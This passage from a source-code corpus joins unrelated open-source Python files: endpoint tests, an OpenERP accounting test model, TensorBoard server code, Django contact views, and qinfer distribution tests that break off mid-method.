        endpoint.add_property(('array_prop', [1, 2, 3, 4, 5]), sync=False)
        self.assertIsNone(endpoint.properties)
        endpoint.save()
        SessionService.commit()
        self.assertTrue('boolean_prop' in endpoint.properties)
        self.assertTrue('double_prop' in endpoint.properties)
        self.assertTrue('int_prop' in endpoint.properties)
        self.assertTrue('long_prop' in endpoint.properties)
        self.assertTrue('map_prop_datacenter' in endpoint.properties)
        self.assertTrue('string_prop' in endpoint.properties)
        self.assertTrue('array_prop' in endpoint.properties)
        endpoint.del_property('int_prop', sync=False)
        endpoint.del_property('long_prop', sync=False)
        endpoint.del_property('double_prop', sync=False)
        endpoint.del_property('boolean_prop', sync=False)
        endpoint.del_property('string_prop', sync=False)
        endpoint.del_property('map_prop_datacenter', sync=False)
        endpoint.del_property('array_prop', sync=False)
        self.assertTrue('boolean_prop' in endpoint.properties)
        self.assertTrue('double_prop' in endpoint.properties)
        self.assertTrue('int_prop' in endpoint.properties)
        self.assertTrue('long_prop' in endpoint.properties)
        self.assertTrue('map_prop_datacenter' in endpoint.properties)
        self.assertTrue('string_prop' in endpoint.properties)
        self.assertTrue('array_prop' in endpoint.properties)
        endpoint.save()
        SessionService.commit()
        self.assertFalse(endpoint.properties is not None and 'boolean_prop' in endpoint.properties)
        self.assertFalse(endpoint.properties is not None and 'double_prop' in endpoint.properties)
        self.assertFalse(endpoint.properties is not None and 'int_prop' in endpoint.properties)
        self.assertFalse(endpoint.properties is not None and 'long_prop' in endpoint.properties)
        self.assertFalse(endpoint.properties is not None and 'map_prop_datacenter' in endpoint.properties)
        self.assertFalse(endpoint.properties is not None and 'string_prop' in endpoint.properties)
        self.assertFalse(endpoint.properties is not None and 'array_prop' in endpoint.properties)
        endpoint.remove()
        SessionService.commit()
        SessionService.close_session()
    def test_transac_twin_endpoints_link(self):
        # Transactional variant of test_twin_endpoints_link.
        SessionService.open_session("test_transac_twin_endpoints_link")
        container2 = Container(name="test_transac_twin_endpoints_link_container2",
                               gate_uri="ssh://my_host/docker/test_transac_twin_endpoints_link_container2",
                               primary_admin_gate_name="container name space (pid)", company="Docker",
                               product="Docker", c_type="container")
        node2 = Node(name="mysqld2", container=container2)
        endpoint1 = Endpoint(url="mysql://test_transac_twin_endpoints_link_container1:4385", parent_node_id=self.node1.id)
        endpoint2 = Endpoint(url="mysql://test_transac_twin_endpoints_link_container2:4385", parent_node=node2)
        endpoint1.add_twin_endpoint(endpoint2, sync=False)
        self.assertTrue(endpoint2 in endpoint1.twin_endpoints_2_add)
        endpoint1.save()
        SessionService.commit()
        self.assertFalse(endpoint2 in endpoint1.twin_endpoints_2_add)
        self.assertTrue(endpoint2.id in endpoint1.twin_endpoints_id)
        self.assertTrue(endpoint1.id in endpoint2.twin_endpoints_id)
        endpoint2.del_twin_endpoint(endpoint1, sync=False)
        self.assertTrue(endpoint1 in endpoint2.twin_endpoints_2_rm)
        self.assertTrue(endpoint2.id in endpoint1.twin_endpoints_id)
        self.assertTrue(endpoint1.id in endpoint2.twin_endpoints_id)
        endpoint2.save()
        SessionService.commit()
        self.assertFalse(endpoint1 in endpoint2.twin_endpoints_2_rm)
        self.assertFalse(endpoint2.id in endpoint1.twin_endpoints_id)
        self.assertFalse(endpoint1.id in endpoint2.twin_endpoints_id)
        endpoint1.add_twin_endpoint(endpoint2)
        SessionService.commit()
        self.assertTrue(endpoint2.id in endpoint1.twin_endpoints_id)
        self.assertTrue(endpoint1.id in endpoint2.twin_endpoints_id)
        endpoint2.del_twin_endpoint(endpoint1)
        SessionService.commit()
        self.assertFalse(endpoint2.id in endpoint1.twin_endpoints_id)
        self.assertFalse(endpoint1.id in endpoint2.twin_endpoints_id)
        endpoint1.remove()
        endpoint2.remove()
        node2.remove()
        container2.remove()
        SessionService.commit()
        SessionService.close_session()
| agpl-3.0 |
Comunitea/OCB | addons/account_test/account_test.py | 342 | 2169 | # -*- encoding: utf-8 -*-
##############################################################################
#
# Copyright (c) 2005-2006 TINY SPRL. (http://tiny.be) All Rights Reserved.
#
# $Id: product_expiry.py 4304 2006-10-25 09:54:51Z ged $
#
# WARNING: This program as such is intended to be used by professional
# programmers who take the whole responsability of assessing all potential
# consequences resulting from its eventual inadequacies and bugs
# End users who are looking for a ready-to-use solution with commercial
# garantees and support are strongly adviced to contract a Free Software
# Service Company
#
# This program is Free Software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
#
##############################################################################
from openerp.osv import fields, osv
CODE_EXEC_DEFAULT = '''\
res = []
cr.execute("select id, code from account_journal")
for record in cr.dictfetchall():
res.append(record['code'])
result = res
'''
class accounting_assert_test(osv.osv):
    """Definition of an accounting sanity test (OpenERP 7 ``osv`` model).

    Each record stores a Python snippet (``code_exec``) that the account_test
    module runs to check the books; tests are listed by ``sequence``.
    """
    _name = "accounting.assert.test"
    _order = "sequence"
    _columns = {
        'name': fields.char('Test Name', required=True, select=True, translate=True),
        'desc': fields.text('Test Description', select=True, translate=True),
        'code_exec': fields.text('Python code', required=True),
        # Inactive tests are kept in the database but skipped by the runner.
        'active': fields.boolean('Active'),
        'sequence': fields.integer('Sequence'),
    }
    _defaults = {
        'code_exec': CODE_EXEC_DEFAULT,
        'active': True,
        'sequence': 10,
    }
| agpl-3.0 |
MostafaGazar/tensorflow | tensorflow/tensorboard/backend/server.py | 4 | 5623 | # Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Module for building TensorBoard servers.
This is its own module so it can be used in both actual code and test code.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import functools
import os
import threading
import time
import six
from six.moves import BaseHTTPServer
from six.moves import socketserver
from tensorflow.python.platform import tf_logging as logging
from tensorflow.python.summary import event_accumulator
from tensorflow.python.summary.impl import gcs
from tensorflow.tensorboard.backend import handler
# How many elements to store per tag, by tag type. These caps bound
# TensorBoard's memory use when reservoir-sampling large event files:
# heavyweight payloads (images, audio) keep only a few samples, while cheap
# scalars keep many.
TENSORBOARD_SIZE_GUIDANCE = {
    event_accumulator.COMPRESSED_HISTOGRAMS: 500,
    event_accumulator.IMAGES: 4,
    event_accumulator.AUDIO: 4,
    event_accumulator.SCALARS: 1000,
    event_accumulator.HISTOGRAMS: 50,
}
def ParseEventFilesSpec(logdir):
  """Parses `logdir` into a map from paths to run group names.

  `logdir` is a comma-separated list of path specifications. Each
  specification is either 'group_name:/path/to/directory' or a bare
  '/path/to/directory' (unnamed group). A group name cannot start with a
  forward slash: '/foo:bar/baz' is read as an unnamed spec whose path is
  '/foo:bar/baz'. Globs are not supported.

  Args:
    logdir: A comma-separated list of run specifications, or None.

  Returns:
    A dict like {'/path/to/directory': 'name'} mapping directory paths to
    run names; unnamed groups map to None. An empty dict if `logdir` is
    None, which is helpful for testing things that don't require any valid
    runs.
  """
  path_to_run = {}
  if logdir is None:
    return path_to_run
  for spec in logdir.split(','):
    # A GCS path may itself contain a colon, so it is never split. Otherwise
    # 'name:/some/path' splits at the first colon, while anything starting
    # with '/' (or containing no colon) is an unnamed path.
    if gcs.IsGCSPath(spec) or ':' not in spec or spec.startswith('/'):
      run_name, path = None, spec
    else:
      run_name, _, path = spec.partition(':')
    if not gcs.IsGCSPath(path):
      path = os.path.realpath(path)
    path_to_run[path] = run_name
  return path_to_run
def ReloadMultiplexer(multiplexer, path_to_run):
  """Loads all runs into the multiplexer.

  Args:
    multiplexer: The `EventMultiplexer` to add runs to and reload.
    path_to_run: A dict mapping from paths to run names, where `None` as the run
      name is interpreted as a run name equal to the path.
  """
  # Time the full add+reload cycle so operators can see how long a refresh
  # takes in the logs.
  start = time.time()
  for (path, name) in six.iteritems(path_to_run):
    multiplexer.AddRunsFromDirectory(path, name)
  multiplexer.Reload()
  duration = time.time() - start
  logging.info('Multiplexer done loading. Load took %0.1f secs', duration)
def StartMultiplexerReloadingThread(multiplexer, path_to_run, load_interval):
  """Starts a thread to automatically reload the given multiplexer.

  The thread will reload the multiplexer by calling `ReloadMultiplexer` every
  `load_interval` seconds, starting immediately.

  Args:
    multiplexer: The `EventMultiplexer` to add runs to and reload.
    path_to_run: A dict mapping from paths to run names, where `None` as the run
      name is interpreted as a run name equal to the path.
    load_interval: How many seconds to wait after one load before starting the
      next load.

  Returns:
    A started `threading.Thread` that reloads the multiplexer.
  """
  # We don't call multiplexer.Reload() here because that would make
  # AddRunsFromDirectory block until the runs have all loaded.
  # Validate GCS support up-front and warn about paths that merely look like
  # GCS paths, before the background thread starts loading them.
  for path in path_to_run.keys():
    if gcs.IsGCSPath(path):
      gcs.CheckIsSupported()
      logging.info(
          'Assuming %s is intended to be a Google Cloud Storage path because '
          'it starts with %s. If it isn\'t, prefix it with \'/.\' (i.e., use '
          '/.%s instead)', path, gcs.PATH_PREFIX, path)
  def _ReloadForever():
    # First reload happens immediately, then every load_interval seconds.
    while True:
      ReloadMultiplexer(multiplexer, path_to_run)
      time.sleep(load_interval)
  thread = threading.Thread(target=_ReloadForever)
  # Daemon thread: a pending sleep must not block interpreter shutdown.
  thread.daemon = True
  thread.start()
  return thread
class ThreadedHTTPServer(socketserver.ThreadingMixIn,
                         BaseHTTPServer.HTTPServer):
  """A threaded HTTP server."""
  # Handler threads are daemons so an in-flight request cannot keep the
  # process alive after the main thread exits.
  daemon_threads = True
def BuildServer(multiplexer, host, port):
  """Sets up an HTTP server for running TensorBoard.

  Args:
    multiplexer: An `EventMultiplexer` that the server will query for
      information about events.
    host: The host name.
    port: The port number to bind to, or 0 to pick one automatically.

  Returns:
    A `BaseHTTPServer.HTTPServer`.
  """
  # Bind the multiplexer into the handler class so every request handler the
  # server instantiates shares the same event data.
  factory = functools.partial(handler.TensorboardHandler, multiplexer)
  return ThreadedHTTPServer((host, port), factory)
| apache-2.0 |
huang4fstudio/django-contacts | src/contacts/views/company.py | 1 | 5913 | from django.core.urlresolvers import reverse
from django.template.defaultfilters import slugify
from django.core.paginator import Paginator, InvalidPage, EmptyPage
from django.http import Http404, HttpResponseForbidden, HttpResponseServerError, HttpResponseRedirect
from django.shortcuts import render_to_response, get_object_or_404
from django.template import RequestContext
from contacts.models import Company
from contacts.forms import CompanyCreateForm, CompanyUpdateForm, PhoneNumberFormSet, EmailAddressFormSet, InstantMessengerFormSet, WebSiteFormSet, StreetAddressFormSet, SpecialDateFormSet
def list(request, page=1, template='contacts/company/list.html'):
    """List of all the companies, paginated 20 per page.

    :param page: 1-indexed page number; out-of-range pages fall back to the
        last page.
    :param template: Add a custom template.
    """
    company_list = Company.objects.all()
    paginator = Paginator(company_list, 20)
    try:
        companies = paginator.page(page)
    except (EmptyPage, InvalidPage):
        # Out-of-range or non-numeric page: show the last available page.
        companies = paginator.page(paginator.num_pages)
    kwvars = {
        'object_list': companies.object_list,
        'has_next': companies.has_next(),
        'has_previous': companies.has_previous(),
        'has_other_pages': companies.has_other_pages(),
        'start_index': companies.start_index(),
        'end_index': companies.end_index(),
        # BUG FIX: previous_page_number()/next_page_number() were called
        # unconditionally; since Django 1.5 they raise InvalidPage on the
        # first/last page, turning a normal listing into a 500 error.
        # Guard them and expose None at the boundaries instead.
        'previous_page_number': companies.previous_page_number() if companies.has_previous() else None,
        'next_page_number': companies.next_page_number() if companies.has_next() else None,
    }
    return render_to_response(template, kwvars, RequestContext(request))
def detail(request, pk, slug=None, template='contacts/company/detail.html'):
    """Detail of a company.

    :param template: Add a custom template.
    """
    # get_object_or_404 raises Http404 on a missing company, exactly like the
    # explicit try/except around Company.objects.get would.
    company = get_object_or_404(Company, pk__iexact=pk)
    return render_to_response(template, {'object': company},
                              RequestContext(request))
def create(request, template='contacts/company/create.html'):
    """Create a company.

    GET renders an empty form; POST validates and saves, redirecting to the
    new company on success or re-rendering the bound form (with its errors)
    on failure.

    :param template: A custom template.
    """
    user = request.user
    if not user.has_perm('add_company'):
        return HttpResponseForbidden()
    if request.method == 'POST':
        company_form = CompanyCreateForm(request.POST)
        if company_form.is_valid():
            c = company_form.save(commit=False)
            # TODO Make sure that the slug isn't already in the database
            if c.nickname:
                c.slug = slugify(c.nickname)
            else:
                c.slug = slugify(c.name)
            c.save()
            return HttpResponseRedirect(c.get_absolute_url())
        # BUG FIX: an invalid POST previously returned the class
        # HttpResponseServerError (not even an instance); fall through to
        # re-render the bound form so the user sees the validation errors.
    else:
        # BUG FIX: GET previously built CompanyCreateForm(request.POST),
        # binding the form to an empty QueryDict and showing spurious
        # "this field is required" errors. Use an unbound form instead.
        company_form = CompanyCreateForm()
    kwvars = {
        'form': company_form,
    }
    return render_to_response(template, kwvars, RequestContext(request))
def update(request, pk, slug=None, template='contacts/company/update.html'):
    """Update a company and its related contact-detail formsets.

    :param template: A custom template.
    """
    user = request.user
    if not user.has_perm('change_company'):
        return HttpResponseForbidden()
    try:
        company = Company.objects.get(pk__iexact=pk)
    except Company.DoesNotExist:
        raise Http404
    # Unbound form/formsets for the GET path; replaced with bound ones below
    # when the request is a POST.
    form = CompanyUpdateForm(instance=company)
    phone_formset = PhoneNumberFormSet(instance=company)
    email_formset = EmailAddressFormSet(instance=company)
    im_formset = InstantMessengerFormSet(instance=company)
    website_formset = WebSiteFormSet(instance=company)
    address_formset = StreetAddressFormSet(instance=company)
    special_date_formset = SpecialDateFormSet(instance=company)
    if request.method == 'POST':
        form = CompanyUpdateForm(request.POST, instance=company)
        phone_formset = PhoneNumberFormSet(request.POST, instance=company)
        email_formset = EmailAddressFormSet(request.POST, instance=company)
        im_formset = InstantMessengerFormSet(request.POST, instance=company)
        website_formset = WebSiteFormSet(request.POST, instance=company)
        address_formset = StreetAddressFormSet(request.POST, instance=company)
        special_date_formset = SpecialDateFormSet(request.POST, instance=company)
        # BUG FIX: special_date_formset was saved without ever being
        # validated (it was missing from this conjunction), so invalid
        # special-date input crashed on save() instead of re-rendering the
        # form with its errors.
        if form.is_valid() and phone_formset.is_valid() and \
            email_formset.is_valid() and im_formset.is_valid() and \
            website_formset.is_valid() and address_formset.is_valid() and \
            special_date_formset.is_valid():
            form.save()
            phone_formset.save()
            email_formset.save()
            im_formset.save()
            website_formset.save()
            address_formset.save()
            special_date_formset.save()
            return HttpResponseRedirect(company.get_absolute_url())
    kwvars = {
        'form': form,
        'phone_formset': phone_formset,
        'email_formset': email_formset,
        'im_formset': im_formset,
        'website_formset': website_formset,
        'address_formset': address_formset,
        'special_date_formset': special_date_formset,
        'object': company,
    }
    return render_to_response(template, kwvars, RequestContext(request))
def delete(request, pk, slug=None, template='contacts/company/delete.html'):
    """Delete a company after an explicit confirmation POST.

    :param template: A custom template.
    """
    user = request.user
    if not user.has_perm('delete_company'):
        return HttpResponseForbidden()
    try:
        company = Company.objects.get(pk__iexact=pk)
    except Company.DoesNotExist:
        raise Http404
    if request.method == 'POST':
        new_data = request.POST.copy()
        # NOTE(review): a POST without the 'delete_company' key raises
        # KeyError (500) here — confirm the confirmation template always
        # submits that field.
        if new_data['delete_company'] == 'Yes':
            company.delete()
            return HttpResponseRedirect(reverse('contacts_company_list'))
        else:
            # User answered "No": bounce back to the company detail page.
            return HttpResponseRedirect(company.get_absolute_url())
    kwvars = {
        'object': company,
    }
    return render_to_response(template, kwvars, RequestContext(request))
Alan-Robertson/python-qinfer | src/qinfer/tests/test_distributions.py | 3 | 28505 | #!/usr/bin/python
# -*- coding: utf-8 -*-
##
# test_distributions.py: Checks that distribution objects act as expected.
##
# © 2017, Chris Ferrie (csferrie@gmail.com) and
# Christopher Granade (cgranade@cgranade.com).
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
#
# 3. Neither the name of the copyright holder nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
##
## FEATURES ###################################################################
from __future__ import absolute_import
from __future__ import division # Ensures that a/b is always a float.
## IMPORTS ####################################################################
import numpy as np
import scipy.stats
from numpy.testing import assert_equal, assert_almost_equal, assert_array_less
from qinfer.tests.base_test import DerandomizedTestCase
from qinfer.utils import assert_sigfigs_equal
from qinfer.distributions import *
## CLASSES ####################################################################
class TestNormalDistributions(DerandomizedTestCase):
    """
    Tests ``NormalDistribution`` and ``MultivariateNormalDistribution``
    """
    ## TEST METHODS ##
    def test_normal_moments(self):
        """
        Distributions: Checks that the normal distribution has the right moments.
        """
        dist = NormalDistribution(0, 1)
        samples = dist.sample(40000)
        # Low-precision checks: Monte Carlo error scales as 1/sqrt(N), and
        # DerandomizedTestCase fixes the RNG seed so results are repeatable.
        assert_almost_equal(1, samples.var(), 1)
        assert_almost_equal(0, samples.mean(), 2)
    def test_normal_n_rvs(self):
        """
        Distributions: Tests for expected number of RVS.
        """
        dist = NormalDistribution(0, 1)
        assert(dist.n_rvs == 1)
    def test_multivar_normal_moments(self):
        """
        Distributions: Checks that the multivariate
        normal distribution has the right moments.
        """
        MU = np.array([0,1])
        COV = np.array([[1,0.2],[0.2,2]])
        dist = MultivariateNormalDistribution(MU, COV)
        samples = dist.sample(100000)
        # Sample covariance/mean should approximate COV/MU at low precision.
        assert_almost_equal(COV, np.cov(samples[:,0],samples[:,1]), 1)
        assert_almost_equal(MU, np.mean(samples, axis=0), 2)
    def test_multivar_normal_n_rvs(self):
        """
        Distributions: Tests for expected number of RVS.
        """
        MU = np.array([0,1])
        COV = np.array([[1,0.2],[0.2,2]])
        dist = MultivariateNormalDistribution(MU, COV)
        assert(dist.n_rvs == 2)
class TestSlantedNormalDistribution(DerandomizedTestCase):
    """
    Tests ``SlantedNormalDistribution``
    """
    ## TEST METHODS ##
    #TODO
    def test_slantednormal_moments(self):
        """
        Distributions: Checks that the slanted normal
        distribution has the right moments.
        """
        ranges = [[0,1],[0,2],[2,3]]
        weight = 2
        dist = SlantedNormalDistribution(ranges=ranges, weight=weight)
        samples = dist.sample(150000)
        # Each coordinate's mean is the midpoint of its range.
        assert_sigfigs_equal(
            np.mean(np.array(ranges), axis=1),
            np.mean(samples, axis=0),
            1)
        # Expected variance per coordinate is (range width)**2/12 + weight**2,
        # consistent with a uniform component plus a weight-scaled normal
        # component -- TODO confirm against SlantedNormalDistribution's docs.
        assert_sigfigs_equal(1/12+4, samples[:,0].var(), 1)
        assert_sigfigs_equal(4/12+4, samples[:,1].var(), 1)
        assert_sigfigs_equal(1/12+4, samples[:,2].var(), 1)
class TestLogNormalDistribution(DerandomizedTestCase):
    """
    Tests ``LogNormalDistribution``
    """
    ## TEST METHODS ##
    def test_lognormal_moments(self):
        """
        Distributions: Checks that the log normal
        distribution has the right moments.
        """
        mu, sig = 3, 2
        dist = LogNormalDistribution(mu=mu, sigma=sig)
        samples = dist.sample(150000)
        # NOTE(review): scipy.stats.lognorm is parameterized as
        # (s, loc, scale); the reference moments below use lognorm(1, 3, 2),
        # i.e. shape 1, loc mu, scale sigma. Confirm this is how
        # LogNormalDistribution maps (mu, sigma) onto scipy's parameters.
        assert_sigfigs_equal(
            scipy.stats.lognorm.mean(1,3,2),
            samples.mean(),
            1)
        # The variance is large; round both sides before comparing sig figs.
        assert_sigfigs_equal(
            np.round(scipy.stats.lognorm.var(1,3,2)),
            np.round(samples.var()),
            1)
    def test_lognormal_n_rvs(self):
        """
        Distributions: Tests for expected number of RVS.
        """
        dist = LogNormalDistribution(mu=3, sigma=2)
        assert(dist.n_rvs == 1)
class TestUniformDistribution(DerandomizedTestCase):
    """
    Tests ``UniformDistribution`` and ``DiscreteUniformDistribution``
    """
    ## TEST METHODS ##
    def test_univ_uniform_range(self):
        """
        Distributions: Checks that the univariate uniform dist obeys limits.
        """
        for lower, upper in [(0, 1), (-1, 1), (-1, 5)]:
            dist = UniformDistribution([lower, upper])
            samples = dist.sample(1000)
            assert np.all(samples >= lower)
            assert np.all(samples <= upper)
    def test_univ_uniform_moments(self):
        """
        Distributions: Checks that the univ. uniform dist. has the right moments.
        """
        dist = UniformDistribution([[0, 1]])
        samples = dist.sample(10000)
        # We use low-precision checks here, since the error goes as 1/sqrt{N}.
        # Determinism helps us be sure that once we pass, we'll keep passing,
        # but it does nothing to make the moments accurate.
        assert_almost_equal(1 / 12, samples.var(), 2)
        assert_almost_equal(1 / 2, samples.mean(), 2)
    def test_univ_uniform_n_rvs(self):
        """
        Distributions: Tests for expected number of RVS.
        """
        dist = UniformDistribution([[0, 1]])
        assert(dist.n_rvs == 1)
    def test_uniform_shape(self):
        """
        Distributions: Checks that the multivar. uni. dist has the right shape.
        """
        dist = UniformDistribution([[0, 1], [0, 2], [0, 3]])
        assert dist.sample(100).shape == (100, 3)
    def test_uniform_n_rvs(self):
        """
        Distributions: Tests for expected number of RVS.
        """
        dist = UniformDistribution([[0, 1], [0, 2], [0, 3]])
        assert(dist.n_rvs == 3)
    def test_discrete_uniform_moments(self):
        """
        Distributions: Checks that the discrete uniform dist. has the right moments.
        """
        dist = DiscreteUniformDistribution(5)
        samples = dist.sample(200000).astype(float)
        # Consistent with uniform integers on [0, 2**5): expected variance
        # (2**10 - 1)/12 and mean 15.5 (~16 to one significant figure)
        # -- TODO confirm the [0, 2**num_bits) support in the class docs.
        assert_sigfigs_equal((2**10-1)/12, np.var(samples), 1)
        assert_sigfigs_equal(16, np.mean(samples), 1)
    def test_discrete_uniform_n_rvs(self):
        """
        Distributions: Tests for expected number of RVS.
        """
        dist = DiscreteUniformDistribution(5)
        assert(dist.n_rvs == 1)
class TestMVUniformDistribution(DerandomizedTestCase):
    """
    Tests ``MVUniformDistribution``
    """
    ## TEST METHODS ##
    def test_mvuniform_moments(self):
        """
        Distributions: Checks that ``MVUniformDistribution`` has the right moments.
        """
        dist = MVUniformDistribution(dim=6)
        samples = dist.sample(100000)
        # The expected moments match a flat Dirichlet (uniform on the
        # 6-simplex): mean 1/6 per coordinate and variance
        # (1/6)(5/6)/7 = 5/(36*7) -- TODO confirm against the class docs.
        assert_sigfigs_equal(5/(36*7), samples[:,3].var(), 2)
        assert_sigfigs_equal(np.array([1/6]*6), np.mean(samples, axis=0), 2)
    def test_mvuniform_n_rvs(self):
        """
        Distributions: Tests for expected number of RVS.
        """
        dist = MVUniformDistribution(dim=3)
        assert(dist.n_rvs == 3)
class TestConstantDistribution(DerandomizedTestCase):
    """
    Tests ``ConstantDistribution``
    """
    ## TEST METHODS ##
    def test_constant(self):
        """
        Distributions: Checks that the constant distribution is constant.
        """
        dist = ConstantDistribution([1, 2, 3])
        samples = dist.sample(100)
        # Every sample must be exactly the constant vector (1, 2, 3).
        assert samples.shape == (100, 3)
        assert np.all(samples[:, 0] == 1)
        assert np.all(samples[:, 1] == 2)
        assert np.all(samples[:, 2] == 3)
    def test_constant_n_rvs(self):
        """
        Distributions: Tests for expected number of RVS.
        """
        dist = ConstantDistribution([1, 2, 3])
        assert(dist.n_rvs == 3)
class TestBetaDistributions(DerandomizedTestCase):
    """
    Tests ``BetaDistribution`` and ``BetaBinomialDistribution``
    """
    ## TEST METHODS ##
    def test_beta_moments(self):
        """
        Distributions: Checks that the beta distribution has the right
        moments, with either of the two input formats
        """
        alpha, beta = 10, 42
        # Standard Beta(alpha, beta) moments.
        mean = alpha / (alpha + beta)
        var = alpha * beta / ((alpha + beta) ** 2 * (alpha + beta + 1))
        # Constructor form 1: (alpha, beta).
        dist = BetaDistribution(alpha=alpha,beta=beta)
        samples = dist.sample(100000)
        assert samples.shape == (100000,1)
        assert_almost_equal(samples.mean(), mean, 2)
        assert_almost_equal(samples.var(), var, 2)
        # Constructor form 2: (mean, var) -- must yield the same moments.
        dist = BetaDistribution(mean=mean,var=var)
        samples = dist.sample(100000)
        assert samples.shape == (100000,1)
        assert_almost_equal(samples.mean(), mean, 2)
        assert_almost_equal(samples.var(), var, 2)
    def test_beta_n_rvs(self):
        """
        Distributions: Tests for expected number of RVS.
        """
        dist = BetaDistribution(alpha=10,beta=42)
        assert(dist.n_rvs == 1)
    def test_betabinomial_moments(self):
        """
        Distributions: Checks that the beta-binomial distribution has the right
        moments, with either of the two input formats
        """
        n = 10
        alpha, beta = 10, 42
        # Standard beta-binomial moments for n trials.
        mean = n * alpha / (alpha + beta)
        var = n * alpha * beta * (alpha + beta + n) / ((alpha + beta) ** 2 * (alpha + beta + 1))
        dist = BetaBinomialDistribution(n, alpha=alpha,beta=beta)
        samples = dist.sample(1000000)
        assert samples.shape == (1000000,1)
        assert_almost_equal(samples.mean(), mean, 1)
        assert_almost_equal(samples.var(), var, 1)
        # Same check through the (mean, var) constructor form.
        dist = BetaBinomialDistribution(n, mean=mean,var=var)
        samples = dist.sample(1000000)
        assert samples.shape == (1000000,1)
        assert_almost_equal(samples.mean(), mean, 1)
        assert_almost_equal(samples.var(), var, 1)
    def test_betabinomial_n_rvs(self):
        """
        Distributions: Tests for expected number of RVS.
        """
        dist = BetaBinomialDistribution(10, alpha=10,beta=42)
        assert(dist.n_rvs == 1)
class TestDirichletDistribution(DerandomizedTestCase):
    """
    Tests ``DirichletDistribution``
    """
    ## TEST METHODS ##
    def _assert_dirichlet_moments(self, alpha):
        """Sample ``DirichletDistribution(alpha)`` and compare the sample
        mean and variance against the closed-form Dirichlet moments
        mean_i = alpha_i / alpha_0 and
        var_i = alpha_i (alpha_0 - alpha_i) / (alpha_0**2 (alpha_0 + 1)).
        """
        alpha_np = np.asarray(alpha)
        alpha_0 = alpha_np.sum()
        mean = alpha_np / alpha_0
        var = alpha_np * (alpha_0 - alpha_np) / (alpha_0 ** 2 * (alpha_0 + 1))
        dist = DirichletDistribution(alpha)
        samples = dist.sample(100000)
        assert samples.shape == (100000, alpha_np.size)
        assert_almost_equal(samples.mean(axis=0), mean, 2)
        assert_almost_equal(samples.var(axis=0), var, 2)
    def test_dirichlet_moments(self):
        """
        Distributions: Checks that the dirichlet distribution has the right
        moments, with either of the two input formats
        """
        # The original duplicated the whole moment check verbatim for the
        # two accepted input formats; exercise both through one helper.
        self._assert_dirichlet_moments([1, 2, 3, 4])
        self._assert_dirichlet_moments(np.array([8, 7, 5, 2, 2]))
class TestGammaDistribution(DerandomizedTestCase):
    """
    Tests ``GammaDistribution``
    """
    ## TEST METHODS ##
    def test_gamma_moments(self):
        """
        Distributions: Checks that the gamma distribution has the right
        moments, with either of the two input formats
        """
        alpha, beta = 10, 42
        # Shape/rate parameterization: mean = alpha/beta, var = alpha/beta**2.
        mean = alpha / beta
        var = alpha / beta ** 2
        dist = GammaDistribution(alpha=alpha,beta=beta)
        samples = dist.sample(100000)
        assert samples.shape == (100000,1)
        assert_almost_equal(samples.mean(), mean, 2)
        assert_almost_equal(samples.var(), var, 2)
        # Same check through the (mean, var) constructor form.
        dist = GammaDistribution(mean=mean,var=var)
        samples = dist.sample(100000)
        assert samples.shape == (100000,1)
        assert_almost_equal(samples.mean(), mean, 2)
        assert_almost_equal(samples.var(), var, 2)
    def test_gamma_n_rvs(self):
        """
        Distributions: Tests for expected number of RVS.
        """
        dist = GammaDistribution(alpha=10,beta=42)
        assert(dist.n_rvs == 1)
class TestProductDistribution(DerandomizedTestCase):
    """
    Tests ``ProductDistribution``
    """
    ## TEST METHODS ##
    def test_product_moments(self):
        """
        Distributions: Checks that product distributions
        have the right moments.
        """
        dist1 = NormalDistribution(0,1)
        dist2 = MultivariateNormalDistribution(np.array([1,2]),np.array([[2,0],[0,3]]))
        dist = ProductDistribution(dist1, dist2)
        samples = dist.sample(100000)
        # Product samples concatenate the factors' coordinates, so the
        # columns carry (mean, var) of (0,1), (1,2) and (2,3) respectively.
        assert_almost_equal(np.round(np.mean(samples, axis=0)), np.array([0,1,2]))
        assert_almost_equal(np.round(np.var(samples[:,0])), 1)
        assert_almost_equal(np.round(np.var(samples[:,1])), 2)
        assert_almost_equal(np.round(np.var(samples[:,2])), 3)
    def test_product_n_rvs(self):
        """
        Distributions: Tests for expected number of RVS.
        """
        dist1 = NormalDistribution(0,1)
